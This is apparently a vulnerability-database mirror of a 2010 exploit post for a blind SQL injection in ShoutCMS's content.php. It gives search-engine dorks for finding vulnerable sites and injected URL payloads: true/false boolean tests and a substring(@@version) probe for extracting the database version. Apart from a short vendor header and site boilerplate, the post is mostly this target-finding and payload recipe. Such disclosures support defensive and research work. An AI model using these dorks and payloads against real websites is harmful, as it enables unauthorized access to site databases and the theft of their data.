Lucene search

ShoutCMS (content.php) Blind Sql Injection Vulnerability

🗓️ 01 Feb 2010 00:00:00Reported by Zero ColdType

zdt🔗 0day.today👁 9 Views

Blind SQL injection vulnerability in ShoutCMS identified through specific URL queries.

========================================================
ShoutCMS (content.php) Blind Sql Injection Vulnerability
========================================================

.:. Script         : Shout! Script
 
.:. Vendor         : http://www.mediashaker.com/index.php
 
.:. Bug Type       : Blind Sql Injection
 
.:. Dork           : [1] "Powered by Shout!"
                     [2] intitle:"Shout" inurl:"admindex.php"
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/content.php?id=54+and+1=1       >>> True
www.site.com/content.php?id=54+and+1=2       >>> False
 
 
www.site.com/content.php?id=54+and substring(@@version,1,1)=4  >>> True
www.site.com/content.php?id=54+and substring(@@version,1,1)=5  >>> False



#  0day.today [2018-04-14]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

01 Feb 2010 00:00Current

7.1High risk

Vulners AI Score7.1